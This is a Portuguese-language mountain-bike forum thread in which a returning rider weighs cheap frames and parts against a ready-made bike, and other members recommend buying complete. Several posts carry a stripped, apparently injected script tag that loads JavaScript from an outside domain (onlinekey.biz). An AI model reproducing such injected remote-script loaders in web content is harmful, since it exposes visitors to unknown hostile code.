| PEDAL | HOME | ARTIGOS | BIKES | TESTES | COMUNIDADE | CLASSIFICADOS | FORUM | FOTOS | VIDEOS | NOTICIAS | TRILHAS | SERVICOS | CONTATO | + |
Fórum Início Fórum Início > Fórum Mountain Biking > Cross-Country / Maratona / Eliminator / Uphill
  Tópicos recentes Tópicos recentes RSS Feed - Quadro para iniciar no MTB.
   [REGRAS]    Ajuda Ajuda  Procurar no fórum   Registrar Registrar  Entrar Entrar

Quadro para iniciar no MTB.

Responder Responder
Autor
Mensagem
  Tópico Procurar Tópico Procurar  Opções do Tópico Opções do Tópico
Kling.thiago Ver Drop Down

Ibitipoca MG
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de Kling.thiago Citação de  ResponderResposta Link direto para este Post Tópico: Quadro para iniciar no MTB.
    Enviado: 21 Fev 2019 as 22:54
Olá pessoal. Tudo bem?

Sou novato no fórum, e posso dizer que no MTB também. Pedalei bstante de "cros-inha" na adolescencia, mas depois parei e agora, aos 31, pretendo retornar, mas indo pra terra, afinal, quando parei com a bike, fui pras montanhas. Agora quero juntar os dois mundos. Terra e bike.

Tenho pesquisado um quadro de até 500$, e investir em componentes melhores, pois entendo que a principio, serão estredas de terra mais tranquilas, então o quadro não vai tomar tanta porrada.

Sendo assim, vou listar uns que chei de até 500pilas que me interessaram:

GTSm1 i-Vtec
VikingX ultra
First lift
Gta nx9
Mosso rampage
Toten b202
Kapa sigma

Dentre estas opções...
Quais sugerem?

Sei que pelo valor jamais sejá pra casar...
Mas é apenas pra pegar ritmo, ate que um dia invista em algo realmente bom.

Gratidão pessoal.
Voltar para o topo
jh1991 Ver Drop Down

bh
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de jh1991 Citação de  ResponderResposta Link direto para este Post Enviado: 21 Fev 2019 as 23:13
No final quanto pretende gastar?
Se inscrevam no youtube.
https://www.youtube.com/c/bikeestilo?sub_confirmation=1
Voltar para o topo
miniic Ver Drop Down

Curitiba
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de miniic Citação de  ResponderResposta Link direto para este Post Enviado: 22 Fev 2019 as 08:41
Já tem os componentes ou vai comprar tudo separado?
Montar bike ainda mais nessa faixa não vale muito a pena...
Voltar para o topo

Ibitipoca MG
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de Kling.thiago Citação de  ResponderResposta Link direto para este Post Enviado: 22 Fev 2019 as 12:06
Olá pessoal.
Então...

Vou comprar os componentes pouco a pouco. Não tenho nada ainda.
Estou montando uma planilha com os componentes que pretendo adquirir. 
Tudo, no mercado livre, está saindo a R$ 2776,00 (sem frete)

Ficou assim:

• Quadro First Active | tam: 17 (Tenho 1,74mts) 
  • Aro Vzan Xtreme
  • Conjunto de mesa, guidão e canote First
  • Grupo Shimano de freio e câmbio Tourney
  • RapidFire Shimano Tourney
  • Selim First
  • Paralamas
  • Suspenção Ar/hidraulica GTA RX com trava no guidão
  • Câmaras de Ar Pirelli
  • Cubos Shimano Tourney

Sei que futuramente precisarei fazer upgrades, mas aí estes itens serão incorporados a bike da patroa que pretende um uso mais urbano. 
O que acham?
< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">

Voltar para o topo
miniic Ver Drop Down

Curitiba
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de miniic Citação de  ResponderResposta Link direto para este Post Enviado: 22 Fev 2019 as 12:09
2700 com tourney (imagino que é disco mecânico inclusive) e suspensão GTA Confused
A Caloi Moab fica nessa faixa de preço, suspensão rock shox e conjunto todo alívio (freio hidráulico).
Tem muita coisa melhor pelo mesmo dinheiro.

Originalmente Postado por Kling.thiago Kling.thiago Escreveu:

Olá pessoal.
Então...

Vou comprar os componentes pouco a pouco. Não tenho nada ainda.
Estou montando uma planilha com os componentes que pretendo adquirir. 
Tudo, no mercado livre, está saindo a R$ 2776,00 (sem frete)

Ficou assim:

• Quadro First Active | tam: 17 (Tenho 1,74mts) 
  • Aro Vzan Xtreme
  • Conjunto de mesa, guidão e canote First
  • Grupo Shimano de freio e câmbio Tourney
  • RapidFire Shimano Tourney
  • Selim First
  • Paralamas
  • Suspenção Ar/hidraulica GTA RX com trava no guidão
  • Câmaras de Ar Pirelli
  • Cubos Shimano Tourney

Sei que futuramente precisarei fazer upgrades, mas aí estes itens serão incorporados a bike da patroa que pretende um uso mais urbano. 
O que acham?
< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">

Voltar para o topo
ghd Ver Drop Down

SP
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de ghd Citação de  ResponderResposta Link direto para este Post Enviado: 22 Fev 2019 as 12:24
Não vale a pena!
Há vários topicos no fórum sobre pessoas que iam montar e viram que não vale a pena. De uma pesquisada.
Guia de Bikes por faixa de preço => AQUI
Voltar para o topo

Ibitipoca MG
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de Kling.thiago Citação de  ResponderResposta Link direto para este Post Enviado: 22 Fev 2019 as 12:34
Então...
Achei essa Caloi por R$2,500 e realmente me interessou. 
Porém não disponho da grana no momento, e iria montar aos poucos. 

E gostei de verdade do quadro da First shshsh
será que conseguiria passar as peças da Caloi pra um Quadro desses, ou o Active ou o Athymus, assim pegaria esse quadro Caloi e passaria pra Patroa. < ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
Voltar para o topo
Delanes Ver Drop Down

Juiz de Fora MG
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de Delanes Citação de  ResponderResposta Link direto para este Post Enviado: 23 Fev 2019 as 21:28
Cara, comprei uma ontem mais barato (2,599), frete grátis, com kit Alívio da Shimano..dá uma olhada lá:
https://produto.mercadolivre.com.br/MLB-810544574-bicicleta-first-29-shimano-alivio-27v-m4050-disc-hid-brinde-_JM
Voltar para o topo
Delanes Ver Drop Down

Juiz de Fora MG
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de Delanes Citação de  ResponderResposta Link direto para este Post Enviado: 23 Fev 2019 as 21:30
E tem promoção lá por quadros menores ...
Voltar para o topo
miniic Ver Drop Down

Curitiba
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de miniic Citação de  ResponderResposta Link direto para este Post Enviado: 24 Fev 2019 as 07:52
O que você quer dizer com não consigo comprar agora e vou montando aos poucos?
A Caloi tem em várias lojas, pode parcelar tipo no cartão e pagar aos poucos.
Se não tem nada não vejo sentido em comprar em um mês o quadro, noutro os freios, noutro as rodas, depois os pneus... Vai conseguir andar na bike na mesma data se tivesse juntado a grana e comprado uma pronta.

Veja que a bike que o colega postou usa suspensão GTA (sabe-se lá onde vai conseguir fazer manutenção disso, durabilidade é peças de reposição) e movimento central ponta quadrada! Esteja ciente que é uma bike inferior...

Se tem pouca grana olha na tabela do tópico que mandei, tem opções por cerca de 1000 reais...

Originalmente Postado por Kling.thiago Kling.thiago Escreveu:

Então...
Achei essa Caloi por R$2,500 e realmente me interessou. 
Porém não disponho da grana no momento, e iria montar aos poucos. 

E gostei de verdade do quadro da First shshsh
será que conseguiria passar as peças da Caloi pra um Quadro desses, ou o Active ou o Athymus, assim pegaria esse quadro Caloi e passaria pra Patroa. < ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
Voltar para o topo
Delanes Ver Drop Down

Juiz de Fora MG
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de Delanes Citação de  ResponderResposta Link direto para este Post Enviado: 25 Fev 2019 as 01:21
Infelizmente é difícil de achar a bike perfeita. Tbm estava na mesma situação sua: montar ou não? Se fosse montar, só o kit Alívio (passadores, freios, câmbios..) vale perto dos 2,000.00. Eu tenho todos os preços mais baixos anotados. Essa bike que comprei, pra mim, foi a mais "completa" que encontrei em 3 semanas de pesquisa. Realmente o movimento central e o pedivela não é dos melhores, mas não me preocupam pois tbm estou voltando a pedalar depois de anos... Realmente a suspensão será trocada daqui a uns meses mas será depois de bastante uso.
Concluindo: particularmente prefiro ter uma bike próxima do que quero e sendo usada (e foi dividida em 12x) do que ir montando mês a mês e não estar pedalando (além de ficar mais cara..)
Espero ter ajudado... abraços
Voltar para o topo
KleytonKivel Ver Drop Down

Palhoça - SC
Opções de Post Opções de Post   Obrigado! (0) Obrigado!(0)   Citação de KleytonKivel Citação de  ResponderResposta Link direto para este Post Enviado: 03 Mar 2019 as 21:55
Eu comprei uma Endorphine 5.3 na Netshoes e fui comprando componentes da china, estou muito satisfeito.
Voltar para o topo

Responder Responder
  Compartilhar   

Ir para Permissões do Fórum Ver Drop Down

Forum Software by Web Wiz Forums® version 11.06
Copyright ©2001-2016 Web Wiz Ltd.